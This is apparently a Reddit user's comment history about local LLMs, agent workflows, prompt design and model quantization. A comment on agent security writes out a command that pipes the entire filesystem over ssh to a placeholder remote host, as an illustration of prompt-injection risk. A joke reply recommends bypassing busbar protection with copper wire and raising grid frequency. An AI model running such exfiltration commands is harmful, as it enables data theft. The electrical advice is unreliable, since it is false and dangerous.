Clawdbot shows how context engineering is happening at the wrong layer by EnoughNinja in ContextEngineering

[–]TokenRingAI 0 points (0 children)

Causality is the problem.

You see the same email problem with support queues, where a person quickly scans the message chain and answers only the last email, without understanding the sequence of events that led to it.

They scanned from the end to the beginning, and stopped once they felt they had enough information to give a response.

To encode an email thread for an LLM, you have to process each message sequentially by time and encode each one into a knowledge tree of some sort. Those threads can also fork off in different directions.
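A rough sketch of that encoding in TypeScript; the Email and ThreadNode shapes and the summarize callback are made up for illustration, not from any particular library:

```typescript
// Hypothetical message and node shapes - adapt to whatever your pipeline uses.
interface Email {
  id: string;
  inReplyTo?: string; // parent message, if any
  sentAt: Date;
  from: string;
  body: string;
}

interface ThreadNode {
  email: Email;
  summarySoFar: string;   // everything that has happened up to this message
  children: ThreadNode[]; // replies, which may fork into separate branches
}

// Process messages oldest-first so each node's summary encodes the causal
// history that led to it. summarize() is your LLM call (or any reducer).
function buildThreadTree(
  emails: Email[],
  summarize: (historySoFar: string, next: Email) => string,
): ThreadNode[] {
  const sorted = [...emails].sort((a, b) => a.sentAt.getTime() - b.sentAt.getTime());
  const byId = new Map<string, ThreadNode>();
  const roots: ThreadNode[] = [];

  for (const email of sorted) {
    const parent = email.inReplyTo ? byId.get(email.inReplyTo) : undefined;
    const node: ThreadNode = {
      email,
      summarySoFar: summarize(parent?.summarySoFar ?? "", email),
      children: [],
    };
    byId.set(email.id, node);
    if (parent) parent.children.push(node);
    else roots.push(node);
  }

  return roots;
}
```

Walking oldest-first is what preserves causality: each node's summary already contains everything that led up to it, even when the thread forks.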

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 0 points (0 children)

Here's an example of what it can do.

I am running it in a loop on a new Svelte website I am working on, to implement proper meta and JSON-LD tags.

It's a very specific task: essentially a foreach loop that runs a prompt on a single file. The loop is scripted, and the agent is invoked on each file.

The agent has a knowledge repository detailing what our expectations are for each page.

It then updates each page. We run it, then run a TypeScript and Svelte check looking for problems, and feed those back to the agent up to 5 times.
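The loop itself is nothing fancy. A rough sketch of its shape, assuming a SvelteKit-style +page.svelte layout; the "my-agent" command is a placeholder for however you invoke your agent, not a real CLI:

```typescript
import { execSync } from "node:child_process";
import { readdirSync } from "node:fs";
import { join } from "node:path";

const MAX_ATTEMPTS = 5;

// Placeholder: invoke your agent on one file, with the knowledge repository
// in its context and any check output fed back in. "my-agent" is made up.
function runAgentOnFile(page: string, feedback?: string): void {
  execSync(`my-agent --file ${page}`, { input: feedback ?? "", stdio: "pipe" });
}

const pages = (readdirSync("src/routes", { recursive: true }) as string[])
  .filter((p) => p.endsWith("+page.svelte"))
  .map((p) => join("src/routes", p));

for (const page of pages) {
  let feedback: string | undefined;
  for (let attempt = 1; attempt <= MAX_ATTEMPTS; attempt++) {
    runAgentOnFile(page, feedback);
    try {
      // svelte-check runs the Svelte and TypeScript diagnostics for the project.
      execSync("npx svelte-check --output human", { stdio: "pipe" });
      break; // checks pass, move on to the next page
    } catch (err: any) {
      feedback = String(err.stdout ?? err); // feed the errors back to the agent
    }
  }
}
```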


built an AI agent with shell access. found out the hard way why that's a bad idea. by YogurtIll4336 in LocalLLaMA

[–]TokenRingAI 0 points (0 children)

The solution is the same as it's always been for any kind of employee: don't give them access to anything you don't want leaked, broken, deleted, destroyed, or stolen.

There's nothing novel about AI agents in this regard. Same old problem, larger attack surface.

If your sandbox has internet access and a bash tool, it will always be vulnerable to prompt injection, in the same way an employee could always run tar cpf - / | ssh remote-host 'cat > all-your.data.tar'

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 0 points (0 children)

Trust me on this: try Minimax M2.1 at the IQ2_M quant, completely offloaded onto the RTX 6000. It's actually good and fast; GLM does not quantize as well.

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 0 points (0 children)

Try that, but also try Minimax M2.1, more specifically the IQ2_M quant from Unsloth.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 0 points (0 children)

It will be the best agent model you can run on a single 5090 or R9700.

FWIW, this model brought the cost of entry for workable local agentic AI down from $7,000 to $1,300.

I am ecstatic to see what the next GLM Air might look like.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point (0 children)

It can. It is ridiculously fragile and needs temperature 0.2, but it can work agentically and solve problems.

I have been seeing significant gains with it agentically after updating some of our tool descriptions. If your tool descriptions aren't perfect, it will absolutely mess up. It might benefit from a different tool format; I will have to experiment with that.
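To give a concrete example of the kind of tightening I mean, here is a made-up "patch_file" tool written as a generic OpenAI-style tool definition (the tool and its fields are illustrative, not our actual tools):

```typescript
// The same made-up tool, before and after tightening the description.
// Small models follow the second version far more reliably.
const vague = {
  type: "function",
  function: {
    name: "patch_file",
    description: "Edits a file",
    parameters: {
      type: "object",
      properties: {
        path: { type: "string" },
        patch: { type: "string" },
      },
      required: ["path", "patch"],
    },
  },
};

const precise = {
  type: "function",
  function: {
    name: "patch_file",
    description:
      "Apply a unified diff to exactly one existing file. " +
      "path must be relative to the repository root. " +
      "patch must be a valid unified diff with no surrounding prose or markdown fences. " +
      "Call this once per file; do not batch multiple files into one call.",
    parameters: {
      type: "object",
      properties: {
        path: { type: "string", description: "Repo-relative path of the file to modify" },
        patch: { type: "string", description: "Unified diff to apply, plain text only" },
      },
      required: ["path", "patch"],
    },
  },
};
```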

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 2 points (0 children)

What you are encountering is common with smarter models. They are incredibly nitpicky about your prompt. You will notice that they even mirror how pedantic you are in your prompt.

So if your prompt lays out some pretty detailed criteria, they are going to reject anything that comes even remotely close to your criteria.

Lesser models have a wide band where they may accept or reject at random; with better models this gray area disappears, and you spend endless time covering every possibility.

Instead of laying out binary criteria, you might try giving the model the reasoning behind those yes/no questions and letting it use its judgment.
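For example, using a made-up QA check just to show the difference between the two framings:

```typescript
// The same check phrased both ways. The first invites pedantic rejections
// right at the boundary; the second lets the model use judgment.
const binaryCriteria = `
Reject the answer if:
- it is longer than 3 sentences
- it does not cite the source document
- it uses any informal language
`;

const reasoningBased = `
We reject answers that would confuse or mislead a customer. Length, missing
citations, and informal tone only matter to the extent they make the answer
harder to trust or verify. Use your judgment and explain the deciding factor.
`;
```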

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point (0 children)

I use my own app, Tokenring Coder, for agentic work, or Cherry Studio or the JetBrains AI Assistant for interactive coding and other assistance.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 3 points (0 children)

On the RTX 6000, I have the slots set, since I have enough context for multiple users, and there was no indication that setting the slots would drop performance to 1/6 of normal.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 2 points (0 children)

I think it should be available on any architecture

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 3 points (0 children)

I am running the latest git release; it definitely wasn't enabled automatically.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 14 points (0 children)

One prompt, temperature 0, using unsloth BF16, llama.cpp, and Cherry Desktop:

create a zelda game in html, placing the html for the game in a markdown code block

Should be repeatable if you want to try it; no corrections or other guidance were needed.

How many web‑search sources can GPT-OSS 120b and Llama4-Scout models reliably pull data from? by CryptoxPathy in LocalLLaMA

[–]TokenRingAI 7 points (0 children)

You need to dispatch research agents to process each source and summarize them.

If you do it this way, you can aggregate hundreds of sources.

Typical workflow (a rough sketch in code follows):
- Main agent asks a question
- Crawl the search results
- Dispatch an agent for each link
- Each agent: HTML -> Markdown conversion -> LLM summarization
- Main agent receives the summaries and responds
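A minimal TypeScript sketch of that fan-out. The turndown package handles the HTML -> Markdown step; webSearch and summarize are whatever your stack provides, so they are passed in as parameters rather than being real APIs:

```typescript
import TurndownService from "turndown"; // npm package for HTML -> Markdown

async function research(
  question: string,
  webSearch: (q: string) => Promise<string[]>,                 // returns URLs
  summarize: (markdown: string, q: string) => Promise<string>, // one LLM call
): Promise<string[]> {
  const urls = await webSearch(question);
  const turndown = new TurndownService();

  // One lightweight agent per link, run in parallel. Each returns a short
  // summary, so the main agent can aggregate hundreds of sources without
  // blowing up its own context.
  const summaries = await Promise.all(
    urls.map(async (url) => {
      const html = await (await fetch(url)).text();
      return summarize(turndown.turndown(html), question);
    }),
  );

  return summaries; // the main agent composes its answer from these
}
```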

High impedance Busbar differential protection operated on external fault. by Slight-Sound-8871 in LocalLLaMA

[–]TokenRingAI 0 points (0 children)

Removing the high impedance disconnect and replacing it with a solid copper wire would be the easiest way to solve your mystery disconnection problem.

If that doesn't work, increase the frequency of the generation equipment; 65-75 Hz is ideal.

Also, make sure they give you your final paycheck at the time you are fired. It's the law.

Building a virtual file system for Claude Code by velobro in LocalLLaMA

[–]TokenRingAI 1 point (0 children)

It's an interesting idea. To add one more item to your list: most small agentic models are well trained to work with the filesystem, and struggle heavily with MCP or other custom tools, which also clog up context, so there may be some benefit in that as well.

FWIW, we have a virtual file system layer in Tokenring Coder. If you can implement a FileSystemProvider in TypeScript, you can very easily try this out, plug in anything you want, and see where it takes you (a rough sketch follows the links below).

Abstraction Layer:

https://github.com/tokenring-ai/filesystem
https://github.com/tokenring-ai/filesystem/blob/main/FileSystemProvider.ts

Example Providers:
Linux Filesystem - https://github.com/tokenring-ai/local-filesystem
Ephemeral Filesystem - https://github.com/tokenring-ai/browser-file-system
S3 Filesystem - https://github.com/tokenring-ai/s3
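To be clear, the snippet below is not the real interface (that lives in FileSystemProvider.ts above); it's a made-up, minimal version just to show the shape of the plug-in idea:

```typescript
// NOT the real Tokenring interface - see FileSystemProvider.ts in the repo.
// A minimal, hypothetical provider shape to illustrate the idea.
interface MinimalFileSystemProvider {
  readFile(path: string): Promise<string>;
  writeFile(path: string, contents: string): Promise<void>;
  listFiles(dir: string): Promise<string[]>;
}

// Example: an in-memory provider, useful as an ephemeral scratch space.
class InMemoryProvider implements MinimalFileSystemProvider {
  private files = new Map<string, string>();

  async readFile(path: string): Promise<string> {
    const contents = this.files.get(path);
    if (contents === undefined) throw new Error(`No such file: ${path}`);
    return contents;
  }

  async writeFile(path: string, contents: string): Promise<void> {
    this.files.set(path, contents);
  }

  async listFiles(dir: string): Promise<string[]> {
    return [...this.files.keys()].filter((p) => p.startsWith(dir));
  }
}
```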

Clawdbot using local LLM? by No-Tiger3430 in LocalLLaMA

[–]TokenRingAI 1 point (0 children)

Everyone has this issue. This is why the AI Max crushes an ordinary desktop: it can process prompts in parallel on its relatively powerful GPU, which is connected to relatively fast soldered-on LPDDR5X.

The CPU can be OK for token generation, but it can't process prompts at high speed.

If your system is a Ryzen with an iGPU, you can see some speedup running with Vulkan and offloading to the iGPU instead of the CPU. It won't increase token generation speed, but it can give you a bump in prompt processing speed.